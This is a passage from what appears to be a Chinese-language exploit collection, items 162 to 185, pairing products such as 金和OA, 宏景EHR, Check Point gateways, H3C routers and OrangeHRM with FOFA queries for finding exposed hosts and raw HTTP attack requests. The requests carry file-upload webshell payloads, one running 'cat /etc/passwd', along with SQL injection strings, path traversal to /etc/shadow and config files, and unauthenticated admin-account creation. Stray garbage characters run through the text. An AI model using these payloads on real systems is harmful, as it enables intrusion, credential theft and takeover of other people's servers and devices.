1 M! A/ _6 `- q" O, \2 F<ip>1</ip>) o3 \1 L% a4 n; Y& p; @
<fileName>../../../../dizxdell.aspx</fileName>
! n) k- [( M* j+ \<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
5 {/ r" z7 B2 p+ }8 K+ l<tag>3</tag>
9 v2 G L3 |9 |4 d</UploadResume>4 O7 i3 | r( ~0 W. F
</soap:Body>
: v s/ h+ {. G7 T' n+ R% I</soap:Envelope>
' p3 Y$ y+ @; T
" x% |. O/ T& U4 Y6 e5 F6 R |. Z& F! p
http://x.x.x.x/dizxdell.aspx x# Y; G/ R- \" [$ y
0 A0 @% l- M% j' f- s4 ?162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
2 O% r* r# G7 lFOFA: app="和丰山海-数字标牌"
8 K) e6 M3 n9 {) {' hPOST /QH.aspx HTTP/1.1
" y3 M4 V% a& g6 O+ M& vHost: x.x.x.x9 \4 w: A4 v5 c& W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0. Y: X1 Q7 z. a N
Connection: close' u8 W, b$ W! d% {
Content-Length: 583
' T6 `: g7 F* a$ r: H- CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey- F3 \5 F; I/ r: \7 c
Accept-Encoding: gzip7 r" j0 G; Z6 G
' J+ y! |# h) k- q3 v2 w
------WebKitFormBoundaryeegvclmyurlotuey1 g2 w; ~- |$ H0 U6 g1 N
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"" h9 P. a+ ]. t7 ]! Q% O
Content-Type: application/octet-stream
' d$ F0 r* m' g# d0 N/ W! W
& R$ c. N" e0 i5 b8 E5 u<% response.write("ujidwqfuuqjalgkvrpqy") %>' M; u" E' |5 K3 j3 u% S f
------WebKitFormBoundaryeegvclmyurlotuey' l6 N) y9 I% g8 W# z d: R
Content-Disposition: form-data; name="action"
) ^& O" g1 w3 {, W+ M0 N
, |) k* @4 I6 ?$ H6 X$ U- |6 H& B6 Tupload0 x! b; Q9 x7 c. L$ v
------WebKitFormBoundaryeegvclmyurlotuey
, ~! ]! b/ z( E, N' t" R! dContent-Disposition: form-data; name="responderId"
* x1 `- E) L) n- c7 Q- `: n: T `1 q/ [% S5 M
ResourceNewResponder
: Z& f8 F4 a2 Q7 s7 V------WebKitFormBoundaryeegvclmyurlotuey
9 K& d D6 `! w! _: }Content-Disposition: form-data; name="remotePath"
) i2 Y5 Q% N, Y7 i9 y# d( h
5 i* s* h8 }8 @7 W# E: t# V/opt/resources
! W4 `1 y6 Q3 d: i7 Q! U _/ X% T------WebKitFormBoundaryeegvclmyurlotuey--
- U) y1 T9 S2 z
' R6 T& \% K! a, u2 |, t
+ S7 |7 E- C: `6 X$ xhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx6 s4 A" \' T. f ]
P; m) Y3 T% U% A! {
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
" T4 ^6 p' {! P0 f dFOFA: icon_hash="-795291075"% m. S# U. Y: B5 X' ~& T
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
: X; x; r. {8 w% Z0 hHost: x.x.x.x
) i( ] `; H4 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.368 _4 \1 b8 i O+ `5 r) @3 {
Connection: close
; j7 F& j9 f }' m6 c1 Q9 rContent-Length: 293
8 {2 l: ?/ v& W- h' d+ R# O( `Accept: */*
1 b/ A. a* T1 P! x5 u, EAccept-Encoding: gzip, deflate' A) q$ T, }/ Z7 u, k, H# H
Accept-Language: zh-CN,zh;q=0.9
. L9 F1 c v! s. n2 r; H, _Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod4 Q3 u1 T1 L3 v2 I3 f' @ }8 K
! c% `* o% }6 k9 e# [- E7 {/ J
------iiqvnofupvhdyrcoqyuujyetjvqgocod& y" |; ~4 ]6 @$ W" N: b
Content-Disposition: form-data; name="name"/ m3 s5 k1 \6 n+ a
# t$ u0 [' v) B6 u1.php
5 ^! s% H( K( F7 M1 O# U' v------iiqvnofupvhdyrcoqyuujyetjvqgocod
( H/ l& I! s# I7 _/ q( PContent-Disposition: form-data; name="upfile"; filename="1.php"
; o4 r- `* j# m( uContent-Type: image/jpeg
8 P# j0 S5 j0 U: X5 p8 N! U- w$ T; @: E% `& c, o6 [ c
rvjhvbhwwuooyiioxega
) i2 Q& T9 ?4 W) ]7 r" A) Q/ s------iiqvnofupvhdyrcoqyuujyetjvqgocod-- @0 ?: q- F9 L* X5 E4 T. `4 i8 C
5 ?9 @ E: Z4 ~. h! `% d
1 G" x E) t% R3 ]8 Y% {164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传6 u$ r! w; K0 D9 M& J, T+ a' v
FOFA: title="智慧综合管理平台登入"
6 ^0 L/ E7 M4 e7 S; R( a1 V/ rPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.18 R7 }+ i, X+ l, n! Y( O
Host: x.x.x.x
6 I8 ]. h. P* eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
# I2 ?! J2 y+ o5 K/ K) L; tContent-Length: 288
y& t, N( o( u' }- k" a) G- jAccept: application/json, text/javascript, */*; q=0.01, L7 c" `* m) `. C) ]7 Y2 U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
! A9 _9 _8 n5 ?, a" f. rConnection: close& s/ f8 `9 Q1 U8 w3 F) v% H$ P
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl6 J' M' f$ s% A% f/ j( m
X-Requested-With: XMLHttpRequest6 b' [! I0 B) r+ q( w; n1 [ D$ y" x
Accept-Encoding: gzip
7 y8 V6 m1 \0 c' c- ^( c+ E7 A% X/ j) ~7 q' K
------dqdaieopnozbkapjacdbdthlvtlyl- `; T Y" X4 r% P6 `, B8 I& c
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
, ^2 a3 a; s, i! i' [3 w+ m- hContent-Type: image/jpeg v# D+ ^1 | J9 m
/ e# x8 `) g) t! C u7 h
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
! w' t# G5 X% [5 U! z------dqdaieopnozbkapjacdbdthlvtlyl--
m# X' X9 b- N4 V8 d) [1 N$ g" R- g/ R
; P& ?* R' g" y) p
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx" r" R+ P5 }& g: z7 o& A1 G
- f9 a9 Z# O5 p' ]7 l4 k
165. OrangeHRM 3.3.3 SQL 注入
( @0 ~; j' u6 H. }8 T- n# gCVE-2024-36428
$ ^9 U+ P& T) \4 s: D J4 AFOFA: app="OrangeHRM-产品"0 s- c6 b, J. S* k
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))1 Q4 |6 I* {2 w8 d; E8 a/ \
4 |! X- T& ?6 i3 b4 \+ u. r& W9 c2 D0 s$ j# I* _4 ?3 ~7 |$ G# G
166. 中成科信票务管理平台SeatMapHandler SQL注入- z' m9 ~ T" E3 [, N3 Z
FOFA:body="技术支持:北京中成科信科技发展有限公司"
9 T& R* I2 {9 f. d% h9 KPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
# q1 L% s1 S6 [! n( C5 j6 WHost:5 e6 G" l. }9 }. c; c& S
Pragma: no-cache
. c6 U# y8 f, K! Z# c; W, O; qCache-Control: no-cache: S/ Z0 g7 x$ x T8 B* K5 |
Upgrade-Insecure-Requests: 1% P/ q0 _' R6 o O) x0 ?9 ]8 ?2 _# X2 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36! I- r4 C4 B5 C( t: N; n- W' ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 D( r5 Z/ `7 U, G7 L" l$ lAccept-Encoding: gzip, deflate
% a* x* s7 x3 z+ QAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ Q8 {' v: E$ \; KCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
. C7 x' e* ^6 O9 F" KConnection: close
2 a/ j, C) `9 P- w0 FContent-Type: application/x-www-form-urlencoded( {0 Q2 y* J8 ~& f z
Content-Length: 893 E% i. @9 R' a- o( }
) f; C- z- X' Z- I
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE* }5 B7 G- [; { k
M6 j1 i, v) d! D0 S# `
+ C; y4 j7 k9 x6 Y- K167. 精益价值管理系统 DownLoad.aspx任意文件读取
5 z, c5 ~. V. I5 J1 KFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"# E3 K2 ?+ z5 L D0 T# ~2 }. v
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
9 P$ |3 }3 s; RHost:9 I" E+ B/ {4 @' r% L5 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" D6 [' `! `5 }0 FContent-Type: application/x-www-form-urlencoded( T9 J$ @0 h! J' L
Accept-Encoding: gzip, deflate
9 E0 g2 P) Z( x {Accept: */*5 V* \' P0 V% p4 }4 X: \9 k
Connection: keep-alive
% e" N. @# S; L$ r3 ]+ S- { M& `6 H0 y% L
9 V0 I! w# `- S0 m! k+ s+ c
168. 宏景EHR OutputCode 任意文件读取* |& d$ a" l4 \
FOFA:app="HJSOFT-HCM"8 `0 z- |6 J' r/ I8 ^2 v# M1 U
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
, m, {! r5 |) ?# OHost: your-ip1 m$ E5 L- E8 @2 x9 N7 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
7 n: C; M2 r: X! I$ `9 |& NContent-Type: application/x-www-form-urlencoded+ c' {( g$ Z. m% o9 @0 b
Connection: close* w( W5 T! V6 \6 }- N% s6 h
; z8 H. G) V u& R8 y: \$ h& ?: _2 _ |# _) q* T m
9 ~# _5 s. C6 ^; Z169. 宏景EHR downlawbase SQL注入0 h' I1 K: m, G% N
FOFA:app="HJSOFT-HCM"
( C8 C- ?) U$ \GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
4 Y) }. X+ \2 _9 f6 eHost: your-ip$ _' V" V) j# t( m: x7 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 `) S) \- ?; }. h8 |& |3 z* |Accept: */*4 W% \" e% C9 _: Q% f
Accept-Encoding: gzip, deflate
+ l1 @' V6 N2 V: E' Y6 C/ c( X3 MConnection: close
4 O1 W N& m8 @4 i0 Z2 @8 Q2 x+ R+ x9 G
# l& A) j/ u' z9 T; n
, [, L' X4 A$ V* P) E! E6 L
170. 宏景EHR DisplayExcelCustomReport 任意文件读取/ ?) X; {# P. Z' V- I
FOFA:body="/general/sys/hjaxmanage.js"
' ~: y' B. ]; s5 c2 r6 R; tPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1: _5 p9 G" E0 @. l" h1 e/ g* N
Host: balalanengliang5 _6 M! a* I2 j" B( ]$ ^
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: ], r7 b6 B! d' ^$ n" hContent-Type: application/x-www-form-urlencoded
1 {0 z+ `3 r$ J9 i& k- l4 s
5 s8 X* _% E) G" a' _ o* ~filename=../webapps/ROOT/WEB-INF/web.xml
/ d( _- g5 b R8 K7 b: j5 {5 V
6 _! j" v1 e1 U/ S, ^. ?
8 S! C: S/ \% A, }/ `% b171. 通天星CMSV6车载定位监控平台 SQL注入0 i' g- y. n4 o# v
FOFA:body="/808gps/"6 q4 s) {2 \$ r( t! W5 V2 @( P5 V
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
6 X- `) s9 W/ i9 |0 B* m8 aHost: your-ip
% c/ x: A4 b9 y' t8 p' z# L9 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
/ q) Y" j: i. q0 Q+ F) a1 I* e% K+ EAccept: */*
8 y5 E" R% i; p+ R1 W6 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& m( ?$ S! i0 d4 X5 g/ b' P8 ~* m
Accept-Encoding: gzip, deflate
& N! g& m0 @3 O3 {% eConnection: close
$ ~! t! q9 Q% g6 r7 x+ G$ }6 N$ J4 ^2 j8 M$ }' |+ y5 B9 v" L/ r
4 s& v; c( m( [/ g# b' L
: z2 E& @+ ^; N% [6 T172. DT-高清车牌识别摄像机任意文件读取
/ D9 b. t9 d" F k& H! ^FOFA:app="DT-高清车牌识别摄像机"% P: _) Q' _1 {# X J
GET /../../../../etc/passwd HTTP/1.1
& v4 b. I0 r3 Q: o6 I( GHost: your-ip
7 h8 {, c! d% h( k. ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: ^0 z/ I; m% m& M
Accept-Encoding: gzip, deflate
. c- J# v% ~$ D- R6 m- ]Accept: */*
t* y. v+ W. e; Y8 W3 F$ zConnection: keep-alive7 R; s( r* v% @! e% \+ `7 Y
8 ], c1 a% }" h+ q/ P) ^' ^6 T \: x" f% d z! G7 h3 o
0 Y* V" V/ A: n6 Q# n4 S4 f173. Check Point 安全网关任意文件读取
6 M6 k. e4 d. s$ a- l9 W; C0 CCVE-2024-24919
* D1 Q, y8 m) H8 Z* wFOFA:app="Check_Point-SSL-Network-Extender") Q& v% j8 S& \, [! w9 o! }3 ^7 E4 a
POST /clients/MyCRL HTTP/1.1
5 y e0 ~- ?& O: lHost: your-ip2 M6 z/ |3 l0 K L6 k! @; i
Content-Type: application/x-www-form-urlencoded
6 X" W& u$ c& U3 L% M% W* e1 b
5 t1 I. F! w" u5 i0 u W3 |) I2 Z8 K( eaCSHELL/../../../../../../../etc/shadow: i% ?$ f- N6 M W( j
: a' E: b/ D/ s, T$ |9 a4 C) R6 V% r& |$ A' b4 q. m
+ o+ Y- }- s* `7 i/ G' y5 z174. 金和OA C6 FileDownLoad.aspx 任意文件读取( i+ q5 O; W- W! e
FOFA:app="金和网络-金和OA"2 x- Y# h. A8 B# x3 ~# I/ q( b; @
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.18 \* L# i: J+ T# ^' u. e
Host: your-ip3 W! w, J" J# [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.368 ]' M$ o Z. f/ j: k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" w5 d9 M3 i/ O& Z& w6 V
Accept-Encoding: gzip, deflate, br% P! d( M4 ?+ a' ]! G% r( p) G$ L
Accept-Language: zh-CN,zh;q=0.9
, k2 T; H: D8 B* v* m. XConnection: close
4 c4 ~8 P% _# _1 s# u2 T% W% M5 v# K b
+ Q" R! E0 n8 e3 Y! A
& V/ D; e8 U2 ]0 c175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
# {1 [6 F1 _4 z# zFOFA:app="金和网络-金和OA"
% b% m0 v( i, @5 ^+ A2 x) t5 FGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
2 o. p& N/ e- B# A W$ ~Host:8 r' g3 c8 l- L; }* Z0 R
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36) _- v) \1 o" n7 ]. b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ G/ g- z+ [- {! YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! D) S: W% B2 ~$ ^+ D. |& _! a
Accept-Encoding: gzip, deflate, H1 q8 I3 ]2 F
Connection: close
) [0 s1 H: a7 D; O$ l/ u- ZUpgrade-Insecure-Requests: 1
: r! h% d9 o# c6 D8 [
' D9 O4 s( V h6 H- u/ B+ Y* B0 ^ P$ G! c0 G
176. 电信网关配置管理系统 rewrite.php 文件上传
4 n' p; Q( w) LFOFA:body="img/login_bg3.png" && body="系统登录"0 i( b0 W O5 g2 k1 H0 z6 g
POST /manager/teletext/material/rewrite.php HTTP/1.18 P+ d, d' Q: ~' g0 K7 Q( b$ w
Host: your-ip! `& F( T6 e& s* H' X) ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 ~ _7 F" V# |8 M( a
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT; q- |3 |% d% d+ C$ V( K
Connection: close: N% E, ^1 w$ b0 b0 O- Z
6 z. p( j/ a {9 I6 z7 K------WebKitFormBoundaryOKldnDPT
w" L/ D2 n+ a. T0 SContent-Disposition: form-data; name="tmp_name"; filename="test.php"! _# x( E' M7 H3 R9 Q
Content-Type: image/png8 j8 X* l( ?! I& x6 d1 n% z
) `8 G' w4 O% ~
<?php system("cat /etc/passwd");unlink(__FILE__);?>6 `) f1 L6 l% E+ g; i# s/ O% ?
------WebKitFormBoundaryOKldnDPT/ F3 L3 N; d- a, M% N
Content-Disposition: form-data; name="uploadtime"
: `( K1 v6 Q2 N [( Z" E7 a$ W
; u. O5 P" o( y, b; T" F# R
. h; X7 x+ U* o* {) w1 }# |4 J------WebKitFormBoundaryOKldnDPT--; {' L( \' M) }9 C4 y n, I
* L& G- X& _# d) c. [6 I
4 c+ h/ I2 A0 {
: h' D9 g/ i+ S2 u1 \- L177. H3C路由器敏感信息泄露; C- S4 Z$ p V
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg8 E0 R8 o, H3 c: ]9 m2 a5 o
/userLogin.asp/../actionpolicy_status/../M60.cfg
9 T; B+ W6 V( X$ D/userLogin.asp/../actionpolicy_status/../GR8300.cfg
7 R0 b5 x' @0 s0 \4 V; Y/userLogin.asp/../actionpolicy_status/../GR5200.cfg4 x1 u4 l2 t X& N& P2 q p0 z
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
0 S. y1 N# v9 O8 l" S9 c/userLogin.asp/../actionpolicy_status/../GR2200.cfg! S7 s* y7 O/ E$ D9 F7 t' O
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
) n9 a. Y( @6 N/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg- Q. n% q4 }5 M; l n( o4 t
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
& j5 o6 f6 R; y. u/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg' v# P. n, `* {3 t7 m" J o# Q
/userLogin.asp/../actionpolicy_status/../ER5200.cfg: r5 s+ X( [2 f: c' Q3 X
/userLogin.asp/../actionpolicy_status/../ER5100.cfg7 R' I. l- C& H! ]0 G- r
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg( ^( S# w2 n& a2 Q' n
/userLogin.asp/../actionpolicy_status/../ER3260.cfg. y- F5 g( a, ], B3 Z
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg9 j" U( Z4 O6 p9 S9 Y, K; x
/userLogin.asp/../actionpolicy_status/../ER3200.cfg1 e# @. D9 d$ x
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg6 n) M# e3 X+ j, F
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
! }. F1 {! u; z8 B! N/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
0 Z! a* o4 N3 V) D/userLogin.asp/../actionpolicy_status/../ER3100.cfg/ b) G/ i' v0 U4 B+ n
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
. g( z0 \6 F1 q# ^- V' b
# d( j1 w! t" M5 w* F" I$ M( `% K9 J7 r- d d. T. Z* {
178. H3C校园网自助服务系统-flexfileupload-任意文件上传; E2 ]6 ^ {* {0 d" g8 [" A
FOFA:header="/selfservice"( D' s3 G5 ]3 e( | f; |7 M
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
" ]. [' a; X/ }) ?Host:
. m4 y$ A$ A M5 N& KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 F2 t& V5 a1 W, ~/ c; s
Content-Length: 252
6 V a" l( Q7 GAccept-Encoding: gzip, deflate
o4 M j* J; p8 H3 m' o7 ]Connection: close
2 a* d; I6 S3 ]9 k! _# X! A2 l# Z9 SContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
% C `% ?( `. t, K; l-----------------aqutkea7vvanpqy3rh2l
$ {2 c. F4 G/ q# P9 {: mContent-Disposition: form-data; name="12234.txt"; filename="12234"- e2 }* U7 m3 O3 ]/ q- ?) Y$ X
Content-Type: application/octet-stream0 D$ N! N" A* Z4 ~* W8 K/ p3 `5 {
Content-Length: 2554 [0 v5 h* g9 V: D; ?' g6 y
& V/ k8 t, V4 U* j( }% u12234- W2 v& v6 u: }7 l8 a
-----------------aqutkea7vvanpqy3rh2l--
& | H% W1 |5 E
u% C7 ?- O# R n# @/ O! ]
! K H; L- G8 O. z1 rGET /imc/primepush/%2e%2e/flex/12234.txt
& S/ A+ O5 [' C$ O1 H0 ]5 b8 O7 p% O3 `6 D9 I: ]& @
: R9 G" g4 k+ u
179. 建文工程管理系统存在任意文件读取
& z6 ]6 ~# d7 |* M3 q$ ^POST /Common/DownLoad2.aspx HTTP/1.1
' E' _( V! @4 p( o$ qHost: {{Hostname}}
7 V2 T) A8 u n/ bContent-Type: application/x-www-form-urlencoded8 _- B+ O# P4 a
User-Agent: Mozilla/5.0
5 J0 D5 k' t6 B) `" d# c' ~7 a$ ~$ t0 Z9 a8 u" G0 A
path=../log4net.config&Name=
7 G3 g) J/ l& g) {* C8 `: @+ h+ l6 ^6 }- S. t
2 M% P M; w' ^+ `180. 帮管客 CRM jiliyu SQL注入* M% w. h6 L, M7 b1 J* |
FOFA:app="帮管客-CRM"6 N2 K% U3 m7 }% j8 h% @# t
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
1 J. p5 J5 I9 X9 ^0 w" p# PHost: your-ip
2 }2 o- E0 I9 v% WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ j" C) Y; G* _, F" E1 z. e* LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: R& I" J9 O; o; N9 KAccept-Encoding: gzip, deflate
6 F l- V; t: m0 \" Q1 t' f8 mAccept-Language: zh-CN,zh;q=0.9
$ o8 f% `# G1 D! d& z* gConnection: close O$ F0 k% U% l0 I$ {) e9 D
r! ^0 h) t' |- l$ ~% F0 ]
: @( g C# A# D ]; b! N( M181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入- l$ U. Q1 J8 b7 Y" d8 _# V# S
FOFA:"PDCA/js/_publicCom.js"
7 D+ M8 M- b; HPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
5 G! z+ B ], X H5 P! D; P5 `4 {7 DHost: your-ip, Y: e/ `3 ]/ e2 ]# d* s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
! P' h2 ?3 l0 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; K5 k5 N. I. f" y4 qAccept-Encoding: gzip, deflate, br) T; y1 ]( I1 ]/ p+ ? Y( O
Accept-Language: zh-CN,zh;q=0.9
7 \0 q$ B8 B: Y, RConnection: close( Y' C( y* m$ }9 \+ M
Content-Type: application/x-www-form-urlencoded. G7 s+ t# A) b* R/ J
; P! B( M) Y. f% Z# J5 @) u1 w& D9 I8 w9 t- Z2 C/ A" y) w
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20' ^ k4 x( H/ H' o) c% J. V
; V- R( Z5 _4 E4 l( p
% W' R5 o ?/ W/ e! N
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建1 c. G8 }" p) b6 U
FOFA:"PDCA/js/_publicCom.js"
& g( Q, j9 \' I! i& o0 P2 \2 B5 g& P8 fPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.19 m9 m& Q# b5 _ U1 ^$ j+ r C
Host: your-ip
$ x7 P: t" n' w6 I! P( s) l7 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36+ W) o; x4 e/ A, \0 d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 B' m7 |+ O* [* ^9 u3 B( cAccept-Encoding: gzip, deflate, br& u: E2 @1 R. f! n: r# S+ j$ o' `
Accept-Language: zh-CN,zh;q=0.9
$ g& \( n/ [7 ?$ T4 a) O1 OConnection: close5 V. I! V( I7 c: ?! J
Content-Type: application/x-www-form-urlencoded& Z, ^- T& @7 h0 K1 _
, ^; f8 `% e. z4 i/ Q, _: N7 Y6 A: A& k! w& I
username=test1234&pwd=test1234&savedays=12 o g' p: P9 k. a
3 k" E& o" z! q7 m/ y
" D' K) _' z/ V3 l9 ^8 H$ V183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
1 q8 l& K$ B; ^FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
. K6 _4 [+ q% N' k9 t- z- yGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
, W3 ~7 S9 E5 SHost: your-ip; k) P3 S; S+ B' O
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36% q( O% p( S8 g
Accept-Charset: utf-8' P5 f& i% n w, @4 k, T# N6 I9 u
Accept-Encoding: gzip, deflate$ Z; v- N$ W5 } w
Connection: close
$ ^; c% | @6 k6 @7 I" [' `! N9 z9 B
4 }4 g# P& c/ {% I184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
- H' F# Q b- u, q; L+ K: e1 bFOFA:server="SunFull-Webs"
2 m5 x1 X& h' C$ {. J G0 `POST /soap/AddUser HTTP/1.1& k* f1 n8 f. B6 Y& a/ w$ h; Y
Host: your-ip
& @- a* W. m! c+ _" F) Y2 [Accept-Encoding: gzip, deflate' J: h9 F! ]/ ? V& k, m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0- j0 K9 ^2 v: y
Accept: application/xml, text/xml, */*; q=0.01
- n' b3 ~; K- J% k( Y3 J$ lContent-Type: text/xml; charset=utf-8
: n4 u% @: Z+ z8 T H' YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ A# Z7 Z6 h9 U1 g: L5 h9 s9 l+ kX-Requested-With: XMLHttpRequest
V, l" Z" p; @6 x1 }. w! X, ^
4 T. M" U4 L* [- r$ [$ |
* _& Z8 |9 C) }* I4 Minsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')7 @. Q+ ^+ k5 b
8 C, F9 A5 K- a! k+ A& Q" T; x9 k
185. 瑞友天翼应用虚拟化系统SQL注入
6 L* p' p+ v+ A! dversion < 7.0.5.1
